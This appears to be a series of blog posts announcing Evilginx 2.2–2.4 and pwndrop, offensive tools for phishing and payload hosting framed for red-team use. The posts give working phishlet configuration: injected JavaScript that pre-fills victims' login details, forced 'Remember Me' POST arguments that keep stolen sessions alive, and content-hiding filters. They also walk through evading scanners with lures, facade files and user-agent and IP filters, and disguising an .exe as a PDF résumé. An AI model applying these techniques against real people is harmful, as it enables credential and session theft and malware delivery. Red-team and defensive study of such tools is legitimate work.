pry @pry0cc - For pouring me many cups of great ideas, which resulted in great solutions! Also check out his great tool axiom!

Jason Lang @curiousjack - For being able to bend Evilginx to his will and in turn gave me ideas on what features are missing and needed.

@an0nud4y - For sending that PR with amazingly well done phishlets, which inspired me to get back to Evilginx development.

Pepe Berba - For his incredible research and development of custom version of LastPass harvester! I still need to implement this incredible idea in future updates.

Aidan Holland @thehappydinoa - For spending his free time creating these super helpful demo videos and helping keep things in order on Github.

Luke Turvey @TurvSec - For featuring Evilginx and for creating high quality tutorial hacking videos on his Youtube channel

So, again - thank you very much and I hope this tool will stay relevant to your work for the years to come and may it bring you lots of pwnage! Just remember to let me know on Twitter via DM that you are using it and about any ideas you're having on how to expand it further!

Here is the list of upcoming changes:

2.4.0

  • Feature: Create and set up pre-phish HTML templates for your campaigns. Create your HTML file and place {lure_url_html} or {lure_url_js} in code to manage redirection to the phishing page with any form of user interaction. Command: lures edit <id> template <template>
  • Feature: Create customized hostnames for every phishing lure. Command: lures edit <id> hostname <hostname>.
  • Feature: Support for routing connection via SOCKS5 and HTTP(S) proxies. Command: proxy.
  • Feature: IP blacklist with automated IP address blacklisting and blocking on all or unauthorized requests. Command: blacklist
  • Feature: Custom parameters can now be embedded encrypted in the phishing url. Command: lures get-url <id> param1=value1 param2="value2 with spaces".
  • Feature: Requests to phishing urls can now be rejected if User-Agent of the visitor doesn't match the whitelist regular expression filter for given lure. Command: lures edit <id> ua_filter <regexp>
  • List of custom parameters can now be imported directly from file (text, csv, json). Command: lures get-url <id> import <params_file>.
  • Generated phishing urls can now be exported to file (text, csv, json). Command: lures get-url <id> import <params_file> export <export_file> <text|csv|json>.
  • Fixed: Requesting LetsEncrypt certificates multiple times without restarting. Subsequent requests would result in "No embedded JWK in JWS header" error.
  • Removed setting custom parameters in lures options. Parameters will now only be sent encoded with the phishing url.
  • Added with_params option to sub_filter allowing to enable the sub_filter only when specific parameter was set with the phishing url.
  • Made command help screen easier to read.
  • Improved autofill for lures edit commands and switched positions of <id> and the variable name.
  • Increased the duration of whitelisting authorized connections for whole IP address from 15 seconds to 10 minutes.

I'll explain the most prominent new features coming in this update, starting with the most important feature of them all.

Pre-phish HTML Templates

First of all let's focus on what happens when Evilginx phishing link is clicked. It verifies that the URL path corresponds to a valid existing lure and immediately shows you proxied login page of the targeted website.

If that link is sent out into the internet, every web scanner can start analyzing it right away and eventually, if they do their job, they will identify and flag the phishing page.

Pre-phish HTML templates add another step in, before the redirection to phishing page takes place. You can create your own HTML page, which will show up before anything else. On this page, you can decide how the visitor will be redirected to the phishing page.

One idea would be to show up a "Loading" page with a spinner and have the page wait for 5 seconds before redirecting to the destination phishing page. Another one would be to combine it with some social engineering narration, showing the visitor a modal dialog of a file shared with them and the redirection would happen after visitor clicks the "Download" button.

Evilginx 2.4 - Gone Phishing
Pre-phish page requiring the visitor to click the download button before being redirected to the phishing page.

Every HTML template supports customizable variables, which values can be delivered embedded with the phishing link (more info on that below).

There are also two variables which Evilginx will fill out on its own. These are:

{lure_url}: This will be substituted with an unquoted URL of the phishing page. This one is to be used inside your HTML code. Example output: https://your.phish.domain/path/to/phish

{lure_url_js}: This will be substituted with obfuscated quoted URL of the phishing page. Obfuscation is randomized with every page load. This one is to be used inside of your Javascript code. Example output:

'h' + 't' + 'tp' + 's:/' + '/' + 'c' + 'hec' + 'k.' + 't' + 'his' + '.ou' + 't' + '.fa' + 'k' + 'e' + '.' + 'co' + 'm' + '/se' + 'cur' + 'it' + 'y/' + 'c' + 'hec' + 'k?' + 'C' + '=g' + '3' + 'Ct' + 'p' + 'sA'

The first variable can be used with <a href=...> HTML tags like so:

<a href="{lure_url}">Click here</a>

While the second one should be used with your Javascript code:

window.location.assign({lure_url_js});

If you want to use values coming from custom parameters, which will be delivered embedded with the phishing URL, put placeholders in your template with the parameter name surrounded by curly brackets: {parameter_name}

You can check out one of the sample HTML templates I released, here: download_example.html

Evilginx 2.4 - Gone Phishing
HTML source code of example template

Once you create your HTML template, you need to set it for any lure of your choosing. Remember to put your template file in /templates directory in the root Evilginx directory or somewhere else and run Evilginx by specifying the templates directory location with -t <templates_path> command line argument.

Set up templates for your lures using this command in Evilginx:

lures edit <id> templates <template_name>

Custom Parameters in Phishing Links

In previous versions of Evilginx, you could set up custom parameters for every created lure. This didn't work well at all as you could only provide custom parameters hardcoded for one specific lure, since the parameter values were stored in database assigned to lure ID and were not dynamically delivered.

This is changing with this version. Storing custom parameter values in lures has been removed and it's been replaced with attaching custom parameters during phishing link generation. This allows for dynamic customization of parameters depending on who will receive the generated phishing link.

In the example template, mentioned above, there are two custom parameter placeholders used. You can specify {from_name} and {filename} to display a message who shared a file and the name of the file itself, which will be visible on the download button.

To generate a phishing link using these custom parameters, you'd do the following:

lures get-url 0 from_name="Ronald Rump" filename="Annual Salary Report.xlsx"

Remember - quoting values is only required if you want to include spaces in parameter values. You can also escape quotes with \ e.g. variable1=with\"quote.

This will generate a link, which may look like this:

https://onedrive.live.fake.com/download/912381236/Annual_Salary_Report.xlsx?vLT=hvQzgP8bXoSOWvfYKkd5aMsvRgsLEXqL6_4SX3VYI95Jji1JPUnPDNmQUnsdSW9hPbpESDausLz2ckLb6MBT

As you can see both custom parameter values were embedded into a single GET parameter. The parameter name is randomly generated and its value consists of a random RC4 encryption key, checksum and a base64 encoded encrypted value of all embedded custom parameter. This ensures that the generated link is different every time, making it hard to write static detection signatures for. There is also a simple checksum mechanism implemented, which invalidates the delivered custom parameters if the link ever gets corrupted in transit.

Don't forget that custom parameters specified during phishing link generation will also apply to variable placeholders in your js_inject injected Javascript scripts in your phishlets.

It is important to note that you can change the name of the GET parameter, which holds the encrypted custom parameters. You can also add your own GET parameters to make the URL look how you want it. Evilginx is smart enough to go through all GET parameters and find the one which it can decrypt and load custom parameters from.

For example if you wanted to modify the URL generated above, it could look like this:

https://onedrive.live.fake.com/download/912381236/Annual_Salary_Report.xlsx?token=hvQzgP8bXoSOWvfYKkd5aMsvRgsLEXqL6_4SX3VYI95Jji1JPUnPDNmQUnsdSW9hPbpESDausLz2ckLb6MBT&region=en-US&date=20200907&something=totally_irrelevant_get_parameter

Generating phishing links one by one is all fun until you need 200 of them, with each requiring different sets of custom parameters. Thankfully this update also got you covered.

You can now import custom parameters from file in text, CSV and JSON format and also export the generated links to text, CSV or JSON. You can also just print them on the screen if you want.

Evilginx 2.4 - Gone Phishing
Importing custom parameters from file to generate three phishing links

Custom parameters to be imported in text format would look the same way as you would type in the parameters after lures get-url command in Evilginx interface:

[email protected] name="Katelyn Wells"
[email protected] name="George Doh" delay=5000
[email protected] name="John Cena"
params.txt

If you wanted to use CSV format:

email,name,delay
[email protected],"Katelyn Wells",
[email protected],"George Doh",5000
[email protected],"John Cena",
params.csv

And lastly JSON:

[
	{
		"email":"[email protected]",
		"name":"Katelyn Wells"
	},
	{
		"email":"[email protected]",
		"name":"George Doh",
		"delay":"5000"
	},
	{
		"email":"[email protected]",
		"name":"John Cena"
	}
]
params.json

For import files, make sure to suffix a filename with file extension according to the data format you've decided to use, so .txt for text format, .csv for CSV format and .json for JSON.

Generating phishing links by importing custom parameters from file can be done as easily as:

lures get-url <id> import <import_file>

Now if you also want to export the generated phishing links, you can do it with export parameter:

lures get-url <id> import <import_file> export <export_file> <text|csv|json>

Last command parameter selects the output file format.

Custom Hostnames for Phishing Links

Normally if you generated a phishing URL from a given lure, it would use a hostname which would be a combination of your phishlet hostname and a primary subdomain assigned to your phishlet. During assessments, most of the time hostname doesn't matter much, but sometimes you may want to give it a more personalized feel to it.

That's why I wanted to do something about it and make the phishing hostname, for any lure, fully customizable. Since Evilginx is running its own DNS, it can successfully respond to any DNS A request coming its way.

So now instead of being forced to use a phishing hostname of e.g. www.linkedin.phishing.com, you can change it to whatever you want like this.is.totally.not.phishing.com. Of course this is a bad example, but it shows that you can go totally wild with the hostname customization and you're no longer constrained by pre-defined phishlet hostnames. Just remember that every custom hostname must end with the domain you set in the config.

You can change lure's hostname with a following command:

lures edit <id> hostname <your_hostname>

After the change, you will notice that links generated with get-url will use the new hostname.

User-Agent Filtering

This is a feature some of you requested. It allows you to filter requests to your phishing link based on the originating User-Agent header. Just set an ua_filter option for any of your lures, as a whitelist regular expression, and only requests with matching User-Agent header will be authorized.

As an example, if you'd like only requests from iPhone or Android to go through, you'd set a filter like so:

lures edit <id> ua_filter ".*(Android|iPhone).*"

HTTP & SOCKS5 Proxy Support

You can finally route the connection between Evilginx and targeted website through an external proxy.

This may be useful if you want the connections to specific website originate from a specific IP range or specific geographical region. It may also prove useful if you want to debug your Evilginx connection and inspect packets using Burp proxy.

You can check all available commands on how to set up your proxy by typing in:

help proxy

Make sure to always restart Evilginx after you enable proxy mode, since it is the only surefire way to reset all already established connections.

IP Blacklist

If you don't want your Evilginx instance to be accessed from unwanted sources on the internet, you may want to add specific IPs or IP ranges to blacklist. You can always find the current blacklist file in:

~/.evilginx/blacklist.txt

By default automatic blacklist creation is disabled, but you can easily enable it using one of the following options:

blacklist unauth

This will automatically blacklist IPs of unauthorized requests. This includes all requests, which did not point to a valid URL specified by any of the created lures.

blacklist on

This will blacklist IP of EVERY incoming request, despite it being authorized or not, so use caution. This will effectively block access to any of your phishing links. You can use this option if you want to send out your phishing link and want to see if any online scanners pick it up.

If you want to add IP ranges manually to your blacklist file, you can do so by editing blacklist.txt file in any text editor and add the netmask to the IP:

134.123.0.0/16

You can also freely add comments prepending them with semicolon:

; this is a comment
18.123.445.0/24 ;another comment

New with_params Option for Phishlets

You can now make any of your phishlet's sub_filter entries optional and have them kick in only if a specific custom parameter is delivered with the phishing link.

You may for example want to remove or replace some HTML content only if a custom parameter target_name is supplied with the phishing link. This may allow you to add some unique behavior to proxied websites. All sub_filters with that option will be ignored if specified custom parameter is not found.

You can add it like this:

sub_filters:
- {triggers_on: 'auth.website.com', orig_sub: 'auth', domain: 'website.com', search: '<body\s', replace: '<body style="visibility: hidden;" ', mimes: ['text/html'], with_params: ['target_name']}

This will hide the page's body only if target_name is specified. Later the added style can be removed through injected Javascript in js_inject at any point.

Quality of Life Updates

I've also included some minor updates. There are some improvements to Evilginx UI making it a bit more visually appealing. Fixed some bugs I found on the way and did some refactoring. All the changes are listed in the CHANGELOG above.

Epilogue

I'm glad Evilginx has become a go-to offensive software for red teamers to simulate phishing attacks. It shows that it is not being just a proof-of-concept toy, but a full-fledged tool, which brings reliability and results during pentests.

I hope some of you will start using the new templates feature. I welcome all quality HTML templates contributions to Evilginx repository!

If you have any ideas/feedback regarding Evilginx or you just want to say "Hi" and tell me what you think about it, do not hesitate to send me a DM on Twitter.

Also please don't ask me about phishlets targeting XYZ website as I will not provide you with any or help you create them. Evilginx is a framework and I leave the creation of phishlets to you. There are already plenty of examples available, which you can use to learn how to create your own.

Happy phishing!

>> GET EVILGINX HERE <<


Find me on Twitter: @mrgretzky

Email: [email protected]

Pwndrop - Self-hosting Your Red Team Payloads

16 April 2020 at 10:07
Pwndrop - Self-hosting Your Red Team Payloads

I have to admit, I took my sweet time to write this post and release this tool, but the time has finally come. I am finally ready to publish pwndrop, which has been in development for the last two years. Rewritten from scratch once (Angular.js was not a right choice) and stalled for multiple months due to busy times at work.

The timing for the release isn't ideal, but at least I hope using pwndrop can help you get through these tough weeks/months.

Also stay at home, don't eat bats and do not burn any 5G antennas.

If you want to jump straight in and grab the tool, follow this link to Github:

pwndrop - Github

What is pwndrop?

Pwndrop is a self-deployable file hosting service for red teamers, allowing to easily upload and share payloads over HTTP and WebDAV.

Pwndrop - Self-hosting Your Red Team Payloads

If you've ever wasted a whole evening setting up a web server just to host a few files and get that .htaccess file redirection working, fear no more. Your future evenings are safe from being wasted again!

With pwndrop you can set up your own on-premise file server. The features are specifically tailored for red teamers, willing to host their payloads, but the tool can also be used as a normal file sharing service. All uploaded files are accessible via HTTP, HTTPS and WebDAV.

Before jumping into describing what features are present on release, I wanted to give away some information on the tool's development process.

Under the hood

For a long time I wanted a self-hosted Dropbox, which would allow me to easily upload and share files with custom URL paths. There is of course Python's SimpleHTTPServer, which has a decent fanbase, but I badly wanted something that would have a web UI with drag & drop interface and deployable with a single command. The idea was born. I knew I'd make a backend in GO, but I had no experience in using any of the modern frontend libraries. It was 2018 back then and I decided it will be a good opportunity to learn something new.

First came in an idea of using Angular.js, since it is a very robust and well supported framework. In the end, it turned out to be too bloated for my needs and the amount of things I had to learn to just to make a simple UI (I'm looking at you TypeScript) was staggering. I managed to get a proof of concept version working and then scratched the whole project to start anew, almost a year later.

Pwndrop - Self-hosting Your Red Team Payloads
You can see that I had absolutely no regrets killing off this monstrosity.

Then in 2019, a really smart and creative red teamer Jared Haight @jaredhaight released his C2 framework FactionC2 at TROOPERS19. I immediately fell in love with the web UI he did and after chatting a bit with him, I learned he used Vue.js. Vue seemed to be lightweight, relatively new and already pretty popular, which made it a perfect choice. Thanks Jared for inspiration!

I bought Vue.js course at Udemy and in few weeks I was ready to go. If you want to make a tool with a web interface, do check out Vue as it may fit your needs as well.

For my own and your convenience I got rid of all of the npm + webpack clutter to slim down the project as much as possible. When I found out that a small project like pwndrop requires 1000MB of preinstalled packages through npm init, the decision to put the project on a diet was made. I wanted to simplify working with the project as much as possible and cut out the unnecessary middleware. Even using webpack requires learning a ton on how to configure it and I definitely didn't want to spend any extra time on that. Now the project doesn't take more than 70MB of precious hard drive space.

All in all, I've detached the frontend entirely from the build process, allowing the UI files to reside in their own folder, making them easily accessible for modifications and updates. The backend, on the other hand, is a single executable file, which installs itself and runs as a daemon in a background.

My main goal was to dumb down the installation process to the greatest extent and I'm pretty proud of the outcome. The whole project has ZERO dependencies and can be installed as easily as copying the precompiled files to your server and entering a single command to install and launch the server.

Let's now jump into the most important part - the features!

Features

Here is the list of features, which you can use from the get-go in the release version.

Drag & drop uploading of files

Easily drag & drop your files onto pwndrop admin panel to upload them.

Pwndrop - Self-hosting Your Red Team Payloads

Works on mobile

Since the UI is made with Bootstrap, I made sure it is responsive and looks good on every device.

Fun way to use pwndrop on your phone is to take photos with phone camera through the admin panel and they will be automatically uploaded to your server.

Share files over HTTP, HTTPS and even WebDAV

Best part of pwndrop is that it is not just an ordinary web server. My main focus was to support serving files also over WebDAV, which is used for pulling 2nd stage payloads through variety of different methods.

You can even use it with your l33t "UNC Path 0-days" ;)

In the future I plan to also add support for serving files over SMB. This will also allow to steal Net-NTLMv2 hashes from the machines making the request.

Click any of the "copy link" buttons to get a shareable link in your clipboard.

Pwndrop - Self-hosting Your Red Team Payloads

Enable and disable your file downloads

You can enable or disable file's ability to be downloaded, with a single click. Disabled files will return 404 or follow the pre-configured redirection when requested.

Pwndrop - Self-hosting Your Red Team Payloads

Set up facade files to return a different file from the same URL

Each uploaded file can be set up with a facade file, which will be served when a facade is enabled.

For example, you may want to share a link to a Word document with your custom macro payload, but you don't want your macro to be analyzed by online scanners as soon as you paste the link. To protect your payload, you can upload a facade clean document file under your payload file.

When facade mode is enabled all online scanners requesting the file, will receive your clean facade file. This can give you a brief window of evading detection. To have your link return the payload file, you need to manually disable facade mode.

Pwndrop - Self-hosting Your Red Team Payloads

Create custom URL paths without creating directories

You can set whatever URL path you want for your payloads and pwndrop will always return a file when that URL is reached. There is no need to put files into physical directories.

By default, the tool will put every uploaded file under a randomly generated subdirectory. You can easily change it uploaded file's settings.

Pwndrop - Self-hosting Your Red Team Payloads

URL redirects to spoof file extension

Let's say you want to have a shared link, pointing to /download/Salary Charts 2020.docx, but after the user clicks it it should download an HTA payload Salary Charts 2020.docx.hta instead.

Normally you'd have to write some custom .htaccess files to use with Apache's mod_rewrite or fight with nginx configuration files.

With pwndrop you just need to specify the URL path, the file should automatically redirect to.

Pwndrop - Self-hosting Your Red Team Payloads

I will describe the whole setup process in the Quickstart section below.

Change MIME types

In most web servers, web server decides what should be the MIME type of the downloaded file. This gives the web browser information what to do with a file once it is downloaded.

For example a file with text/plain MIME type will be treated as a simple text file and will be displayed in the browser window. The same text file with application/octet-stream MIME type will be treated as a binary file and the browser will save it to a file on disk.

Pwndrop - Self-hosting Your Red Team Payloads

This allows for some interesting manipulation, especially with MIME type confusion exploits.

You can find the list of common MIME types here.

Pwndrop - Self-hosting Your Red Team Payloads

Automatic retrieval of TLS certificates from LetsEncrypt

Once you install pwndrop and point your domain's DNS A records to it, the first attempted HTTPS connection to pwndrop will initiate an automatic retrieval of a TLS certificate from LetsEncrypt.

Secure connections should work out of the box, but do check the readme on Github to learn more about setting it up, especially if you want to use the tool locally or without a domain.

Password protected and hidden admin panel

I wanted to make sure that the admin panel of pwndrop is never visible to people who are not meant to see it. Being able to control the web server fully, I was able to completely lock down access to it. If the viewer's web browser does not have the proper authorization cookie, pwndrop will either redirect to predefined URL or return a 404.

In order to authorize your browser, you need to open a secret URL path on your pwndrop domain. The default path is /pwndrop and should be changed in the settings as soon as the tool is deployed to your server.

Pwndrop - Self-hosting Your Red Team Payloads
Remember to change Secret Path to something unique

If you want to relock access to the admin panel, just change the Secret-Cookie name or value and you will need to visit the Secret-Path again, in order to regain access.

Quickstart

Now that I hope I've managed to highlight all of the features. I wanted to give you a rundown of how to set up your first uploaded file with a facade and redirection.

Goal: Host our payload.exe payload and disguise it as https://www.evilserver.com/uploads/MyResume.pdf shared link. The payload file will be delivered through redirection as MyResume.pdf.exe. The MyResume.pdf file will be set up as a facade file and it will be served as a legitimate PDF file if facade mode is enabled, in order to temporarily hide its true form from online scanners.

Here we go.

0. Deployment

If you don't yet have the server to deploy pwndrop to I highly recommend Digital Ocean. The cheapest $5/mo Debian 9 server with 25GB of storage space will work wonders for you. You can use my referral link to get an extra $100 to spend on your servers in 60 days for free.

I won't be covering the deployment process of pwndrop here on the blog as it may get outdated at some point. Instead check out the always up-to-date README with all the deployment instructions on Github.

If you are in a hurry, though, you can install pwndrop on Linux with a single command:

curl https://raw.githubusercontent.com/kgretzky/pwndrop/master/install_linux.sh | sudo bash

1. Upload your payload executable file

Make sure you authorize your browser first, by opening: https://<yourdomain.com>/pwndrop

Then open https://<yourdomain.com> and follow the instructions on the screen to create your admin account.

IMPORTANT! Do not forget to change the Secret-Path from /pwndrop to something of your choice in the settings.

Use the Upload button or drag & drop payload.exe onto pwndrop to upload your payload file.

Pwndrop - Self-hosting Your Red Team Payloads

2. Upload your PDF facade file

Click the top-left cog icon on your newly uploaded file and the settings dialog will pop out.

Click the facade file upload area or directly drop MyResume.pdf file onto it.

Pwndrop - Self-hosting Your Red Team Payloads

3. Set up redirection

Now you need to change the Path to what it should look like in your shared link. We want it to point to MyResume.pdf so change it to, say: /uploads/MyResume.pdf (you can choose whatever path you want).

Then click the Copy button at the right side of Redirect Path editbox and it will copy the contents of Path editbox to the editbox below.

Just add .exe to the copied path making it /uploads/MyResume.pdf.exe. This will be the path pwndrop redirects to, to serve the payload executable after the user clicks the shared link.

Keep in mind that the redirection will only happen when facade mode is disabled. When facade mode is enabled, pwndrop will serve the facade PDF file instead, not triggering any red flags.

We will also change the MIME type of the facade file, which will show you the power of this feature. While application/x-msdownload MIME type for PDF facade file is valid, the Chrome browser will initiate a download when the shared link is clicked. When you change the MIME type to application/pdf , though, Chrome will open the preview of the PDF file as it will know it is dealing with a PDF file.

Depending on what effect you want to achieve, either having the user download the PDF or have it previewed in the web browser, you can play with different options.

Pwndrop - Self-hosting Your Red Team Payloads

Don't forget to click Save once you're finished with setting up the file.

4. Sharing your file

Now you're done. You can get the HTTP shared link, by clicking the HTTP button. http:// or https:// prefix will be picked based on how you're currently browsing the admin panel. Similarly, if you click the WebDAV button, you will get the WebDAV link copied to your clipboard.

Pwndrop - Self-hosting Your Red Team Payloads

If you ever decide, you want to temporarily disable sharing for this file, just click the power button and it will effectively make the file hidden and links to it will stop working.

Pwndrop - Self-hosting Your Red Team Payloads

Next important thing is enabling the facade. Just click the third button from the left to flip the on/off switch to enable/disable facade mode. When the facade mode is enabled, pwndrop will serve the facade file, which you've uploaded for the given payload, instead of the original payload file. In our example it will deliver the PDF file instead of the payload executable.

Pwndrop - Self-hosting Your Red Team Payloads

Aaand that's it. Enjoy your first shared payload! Hope I've managed to not make the process too complex and that it was pretty easy to follow.

Future Development

I have a lot of ideas I want implemented into pwndrop, but instead of never releasing the tool and keep adding features, because "it is always not yet perfect", I've decided to release the tool as it is now. I will iteratively expand on it by adding new features from time to time.

So before you send me your feedback, check out what I plan to implement in near and far future. I really want to hear what features you'd like to see and how you'd want to use the tool.

Download Counter

This one should be implemented quite fast. It would add a download counter for each file, specifying the number of times the file is allowed to be downloaded. When the limit is reached, pwndrop will either serve a facade file or return file not found.

Download Tracker

This feature is a much needed one, but requires a bit of work. I want to add a separate view panel, which will display in real-time all download requests for every payload file. The log should contain the visitor's User-Agent, IP address and some additional metadata that can be gathered from the particular request.

File dropping with Javascript

There is a method to initiate a file download directly through Javascript executed on an HTML page. It is an effective method for bypassing request scanners of several EDRs.

The idea is that the whole payload file gets embedded into an HTML page as an encrypted blob, which is then decrypted in real-time and served as a download to the web browser. That way there is never a direct request made to a file resource with specific URL, meaning there is nothing to download and scan. EDRs would have to implement Javascript emulation engines in order to execute a dropper script in a sandbox and analyze the decrypted payload.

Conditional facades

At the moment, facade mode can only be enabled/disabled manually, but eventually I'd like this process to be somewhat automated. Pwndrop could check if the request is made with specific cookie, User-Agent or from targeted IP range and then decide whether to serve a payload file or a facade file instead.

Password protected downloads

Sometimes it is good to share a file, which downloads only after entering a valid password. This is the feature I'd also like to have in pwndrop. I'm not yet sure if it should be done with basic HTTP authentication or something custom. Let me know if you have any ideas.

The End (for now!)

This is only the end of this post, but definitely not the end of pwndrop's development. I'd really like to see how you, the red teamers, plan to use this tool and how it can aid you in managing your payloads.

I also hope that you can use this tool not only for work. I hope it helps you share any files you want with the people you want, without having to worry about privacy and/or security issues. Self-hosting is always the best way to go.

Expect future updates on this blog and if you have any feedback you want to share, do contact and follow me on Twitter @mrgretzky.

Get the latest version of pwndrop here:

Enjoy and I'm waiting for your feedback!

Evilginx 2.3 - Phisherman's Dream

18 January 2019 at 05:44
Evilginx 2.3 - Phisherman's Dream

Welcome to 2019!

As was noted, this will be the year of phishing automation. We've already seen a release of new reverse-proxy tool Modlishka and it is only January.

This release would not have happened without the inspiration I received from Michele Orru (@antisnatchor), Giuseppe Trotta (@Giutro) and Piotr Duszyล„ski (@drk1wi). Thank you!

This is by far the most significant update since the release of Evilginx. The 2.3 update makes it unnecessary to manually create your own sub_filters. I talked to many professional red teamers (hello @_RastaMouse) who have struggled with creating their own phishlets, because of the unfair, steep learning curve of figuring out what strings to replace and where, in the proxied HTTP content. I can proudly say that these days are over and it should now be much easier to create phishlets from scratch.

If you arrived here by accident and you have no idea what I'm talking about, check out the first post on Evilginx. It is a phishing framework acting as a reverse proxy, allowing to bypass 2FA authentication.

Let's jump straight into the changes.

Changelog - version 2.3

Here is a full list of changes in this version:

  • Proxy can now create most of required sub_filters on its own, making it much easier to create new phishlets.
  • Added lures, with which you can prepare custom phishing URLs, each having its own set of unique options (help lures for more info).
  • Added OpenGraph settings for lures, allowing to create enticing content for link previews.
  • Added ability to inject custom Javascript into proxied pages.
  • Injected Javascript can be customized with attacker-defined data, specified in lure options.
  • Deprecated landing_path and replaced it with a login section, which contains the domain and path for website's login page.

Diving into more detail now.

Automatic handling of sub_filters

In order for Evilginx to properly proxy a website, it must not stray off its path and it should make sure that all proxied links and redirections are converted from original URLs to the phishing URLs. If the browser navigates to the original URL, the user will no longer be proxied through Evilginx and the phishing will simply fail.

I am aware it was super hard to manually figure out what strings to replace and it took considerable amounts of time to analyze HTML content of every page to manage substitutions, using trial and error method.

Initially I thought that doing the automatic URL substitution, in page body, will just not work well. The guys I mentioned at the top of this post, proved me wrong and I was amazed how well it can work when properly executed. When I saw this method successfully implemented and demonstrated in Modlishka, I was blown away. I knew I had to try and do the same for Evilginx.

It took me a whole weekend to implement the required changes and I'm very happy with the outcome. You can now start creating your phishlet without any sub_filters at all. Just define the proxy_hosts for the domains and subdomains that you want to proxy through and it should work out-of-the-box. You may need to create your own sub_filters only if there is some unusual substitution required to bypass security checks or you just want to modify some HTML to make the phishing scenario look better.

Best thing with automated sub_filters generation is the fact that the whole website's functionality may fully work, through the proxy, even after the user is authenticated (e.g. Gmail's inbox).

Phishing with lures

The tokenized phishing link with redirection URL, encoded in base64 format, was pretty ugly and definitely not perfect for carefully planned phishing attacks. As an improvement, I thought of creating custom URLs with attacker-defined path. Each assigned with a different redirection URL, which would be navigated to on successful authentication through the phishing proxy. This idea eventually surfaced in form of lures.

Evilginx 2.3 - Phisherman's Dream

You can now create as many lures as you want for specific phishlets and you are able to give each of them following options:

  • Custom path to make your phishing URLs look more inviting to be clicked.
  • Redirection URL to navigate the user to, after they successfully authenticate.
  • OpenGraph features, which will inject <og:...> meta tags into proxied website to make the phishing links generate enticing previews when sent in messengers or posted to social media.
  • Customized script content, which will be embedded into your injected Javascript code (e.g. for pre-filling the user's email address).
  • Description for your own eyes to not forget what the lure was for.

Here is how OpenGraph lure configuration can be used to generate an enticing preview for WhatsApp:

Evilginx 2.3 - Phisherman's Dream

On clicking the link, the user will be taken to the attacker-controlled proxied Google login page and on successful authentication, he can be redirected to any document hosted on Google Drive.

The command for generating tokenized phishing links through phishlets get-url still works, although I'd consider it obsolete now. You should now generate phishing URLs with pre-created lures instead: lures get-url 0

To get more information on how to use lures, type in help lures and you will get a list of all sub-commands you can use.

Javascript injection

Now you can inject any javascript code into the proxied HTML content, based on URL path or domain. This gives incredible capabilities for customizing your phishing attack. You could for example make the website pre-fill the email of your target in the authentication form and display their profile photo.

Here is the example of injected javascript that pre-fills the target's email on LinkedIn login page:

js_inject:
  - trigger_domains: ["www.linkedin.com"]
    trigger_paths: ["/uas/login"]
    trigger_params: ["email"]
    script: |
      function lp(){
        var email = document.querySelector("#username");
        var password = document.querySelector("#password");
        if (email != null && password != null) {
          email.value = "{email}";
          password.focus();
          return;
        }
        setTimeout(function(){lp();}, 100);
      }
      setTimeout(function(){lp();}, 100);

You can notice that the email value is set to {email}, which lets Evilginx know that this will be replaced with the value set in the created lure. Setting the email value would be done the following way.

: lures edit params 0 [email protected]

See that the trigger_params variable contains the email value, which means that this javascript will ONLY be injected if the email parameter is configured in the lure used in the phishing attack.

Here is a demo of what a creative attacker could do with Javascript injection on Google, pre-filling his target's details for him:

Evilginx 2.3 - Phisherman's Dream

Removal of landing_url section

To upgrade your phishlets to version 2.3, you have to remove landing_url section and replace it with a login section.

I figured you may want to use a different domain for your phishing URL than the one, which is used to display the login page. For example Google's login page is always at domain accounts.google.com, but you may want the phishing link to point to a different sub-domain like docs.phished-google.com. That way you can add docs.google.com to proxy_hosts and set the option to is_landing: true.

The login section should contain:

login:
  domain: 'accounts.google.com'
  path: '/signin/v2/identifier'

IMPORTANT! The login section always defines where the login page resides on the targeted website.

That way the user will be automatically redirected to the login page domain even when the phishing link originated on a different domain.

Refer to the official phishlets 2.3.0 documentation for more information.

Have fun!

I can proudly say that now the phishlet format is close to being perfect and, since the difficulty of creating one from scratch significantly dropped, I will be starting a series of blog posts teaching how to create a phishlet from scratch, including how to configure everything.

The series will start very soon and posts will be written in hands-on step by step format, showing the whole process of phishlet creation from start to finish, for the website that I pick.

Make sure to follow me on Twitter if you want up-to-date information on Evilginx development.

[Follow me on Twitter](https://twitter.com/mrgretzky)
[Download Evilginx 2 from GitHub](https://github.com/kgretzky/evilginx2)

Evilginx 2.2 - Jolly Winter Update

22 November 2018 at 06:39
Evilginx 2.2 - Jolly Winter Update

Tis the season to be phishing!

I've finally found some free time and managed to take a break to work on preparing a treat for all of you phishing enthusiasts out there. Just in time for the upcoming holiday season, I present you the chilly Evilginx update.

[Download Evilginx 2 from GitHub](https://github.com/kgretzky/evilginx2)

If you've arrived here by accident and have no idea what I'm writing about, do check the first post about Evilginx 2 release.

Without further ado, let's jump straight into the changelog!

Changelog - version 2.2

First, here is a full list of changes made in this version.

  • Added option to capture custom POST arguments additionally to credentials. Check custom field under credentials.
  • Added feature to inject custom POST arguments to requests. Useful for silently enabling "Remember Me" options, during authentication.
  • Restructured phishlet YAML config file to be easier to understand (phishlets from previous versions need to be updated to new format).
  • Removed name field from phishlets. Phishlet name is now determined solely based on the filename.
  • Now when any of auth_urls is triggered, the redirection will take place AFTER response cookies for that request are captured.
  • Regular expression groups working with sub_filters.
  • Phishlets are now listed in a table.
  • Phishlet fields are now selectively lowercased and validated upon loading to prevent surprises.
  • All search fields in the phishlet are now regular expressions by default. Remember about proper escaping!

Now for the details.

Added option to capture custom POST arguments

You can now capture additional POST arguments in requests. Some people mentioned they often need to capture data from other fields like PINs or tokens. Now you can.

Captured field values can be viewed in captured session details.

Evilginx 2.2 - Jolly Winter Update

Find out how to specify custom fields for capture in the official documentation.

Added feature to inject custom POST arguments to requests. Useful for silently enabling "Remember Me" options, during authentication

Almost all websites provide an option to login, without permanently remembering the logged in user. This results in the website storing only temporary session cookies or cookies with short lifespan, which are later invalidated both on the server and the client.

Capturing session cookies, in such scenario, does not give the attacker permanent access. This is why it is most important that phished user ticks the "Remember Me" checkbox to inform the server that persistent authentication is requested. Till now that rested on phished user's shoulders and they could make the decision.

In this version it is now possible to inject an argument into the POST request to inform the server that the "Remember Me" checkbox was ticked (even though it could've been deliberately left unchecked).

As an example, this part of a phishlet will detect the login POST request, containing username and password fields and will add/replace the remember_me parameter to always have a value of 1:

force_post:
  - path: '/sessions'
    search:
      - {key: 'session\[user.*\]', search: '.*'}
      - {key: 'session\[pass[a-z]{4}\]', search: '.*'}
    force:
      - {key: 'remember_me', value: '1'}
    type: 'post'

Play around with it and I'm sure this feature may have other uses that I haven't thought about yet.

Remade phishlet YAML file format

